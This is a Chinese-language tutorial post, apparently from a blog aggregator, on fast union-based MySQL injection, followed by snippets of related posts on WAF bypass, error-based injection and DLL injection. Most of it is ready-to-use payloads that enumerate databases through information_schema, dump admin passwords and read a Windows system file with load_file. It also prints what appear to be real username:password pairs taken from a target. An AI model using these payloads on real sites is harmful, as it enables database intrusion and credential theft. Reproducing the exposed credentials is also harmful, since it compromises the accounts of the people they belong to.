慢注入mysql Mysql注入高效率方法

2021-10-19 23:50:24 字數 1767 閱讀 9525

此方法只適用於mysql 5.0以及5.0以上版本 注入方法和mysql 5 類似

但此方法大大提高了讀取資料庫的速度,此方法並非本人原創,原創出處是國外某牛人

優點在於可以利用information_schema庫與group_concat的配合 來達到一次性讀取出指定資料庫裡的內容,並且在limit被限制的情況下依然可以注入

缺點 當乙個庫存在幾百甚至幾千個表和表字段和資料的時候 讀取出資料的時間會相當的慢...

下面用簡單例項來演示 原理不多說,相信經常玩注入的朋友都知道了.只挑重要部分例項演示

在注入時根據實際情況作出變化 比如過濾了空格,使用/**/ ,  + 等等

union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17

讀出所有庫:

union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.schemata

讀出所有表:

union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()

讀出所有表字段:

union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.columns where table_schema=database() and table_name=char(97,100,109,105,110)

*/ (97,100,109,105,110)為admin的ascii碼 依次類推

讀出所有表字段裡的內容:

union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin

select+1,concat_ws(char(32,58,32),user(),database(),version()),load_file(char(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23

select+1,concat_ws(char(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23

select+1,concat_ws(char(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.columns where table_schema=database()+and+table_name=char(97,100,109,105,110)%23

select+1,concat_ws(char(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23

webmaster:dzb521123,simlab:simadmin20043233

繞安全狗mysql Mysql注入繞過安全狗

mysql注入繞過安全狗 sql注入閉合檢查 sql注入的分類有很多種分法 可以分成數字型和字元型,區別在於是否需要完整閉合。本題中由於我經驗不足,試了好久才想到就是簡單的雙引號加括號就可以閉合了,然後再注釋掉後面的內容。單引號 回顯正常結果 雙引號錯誤回顯 這裡其實可以簡單分析一下,1 是get請...

SQL注入 報錯注入

乙個帶get引數的 並且不從資料庫返回資料,但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...

DLL注入 APC注入

apc注入的原理是利用當執行緒被喚醒時 apc中的註冊函式會被執行的機制,並以此去執行我們的 dll載入 進而完成 dll注入的目的,其具體流程如下 1 當exe 裡某個執行緒執行到 sleepex 或者waitforsingleobjectex 時,系統就會產生乙個軟中斷 或者是messagebo...